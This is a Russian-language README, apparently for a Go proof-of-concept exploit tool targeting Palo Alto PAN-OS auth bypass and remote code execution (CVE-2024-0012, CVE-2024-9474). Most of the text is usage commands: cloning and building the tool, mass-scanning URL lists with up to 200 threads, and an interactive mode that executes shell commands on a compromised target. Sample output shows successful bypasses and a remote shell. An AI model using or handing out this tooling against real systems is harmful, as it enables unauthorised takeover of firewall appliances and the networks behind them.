
Palo Alto RCE уязвимость
Этот скрипт представляет собой Proof of Concept (PoC) эксплойт для уязвимостей, обнаруженных в Palo Alto PAN-OS (CVE-2024-0012 и CVE-2024-9474). Скрипт можно использовать либо для сканирования списка URL-адресов на наличие уязвимости, либо для интерактивной эксплуатации одного уязвимого URL-адреса.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: Шкала прогресса для отображения статуса сканирования. github.com/gookit/color: Расширенная поддержка цветов для вывода в консоль. github.com/manifoldco/promptui: Интерактивные подсказки командной строки. github.com/p0dalirius/goopts/parser: Разбор аргументов командной строки.
Режим сканирования используется для проверки нескольких URL-адресов на наличие уязвимости. Вам необходимо указать файл со списком URL-адресов.
go run main.go --file urls.txt --output results.txt --threads 100
--file: Путь к файлу, содержащему список URL-адресов для сканирования. --output: Путь для сохранения результатов сканирования (по умолчанию: output.txt). --threads: Количество одновременных потоков для сканирования (по умолчанию: 200).
http://example1.com
http://example2.com
Режим эксплуатации позволяет вам интерактивно эксплуатировать уязвимый URL-адрес.
go run main.go --url http://target.com --output results.txt
--url: Целевой URL-адрес для эксплуатации. --output: Путь для сохранения результатов эксплуатации. В режиме эксплуатации вы можете вводить команды, которые будут выполнены на целевой системе. Введите exit, чтобы выйти из интерактивной оболочки.
Чтобы отобразить справочную информацию:
go run main.go --help
После завершения сканирования результаты будут сохранены в указанный выходной файл (например, results.txt):
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
При интерактивной эксплуатации URL-адреса вывод команды отображается после выполнения команд на целевой системе:
# ls /var
bin app lib tmp
# exit
[+] Выход из интерактивной оболочки.
Аргументы командной строки Флаг Описание Значение по умолчанию --url URL-адрес для эксплуатации в режиме эксплуатации --file Файл с URL-адресами для сканирования (используется в режиме сканирования) --output Выходной файл для сохранения результатов output.txt --threads Количество одновременных потоков для сканирования (режим сканирования) 200 --help Показать справочное сообщение
Этот проект лицензирован по лицензии MIT — подробнее см. в файле LICENSE.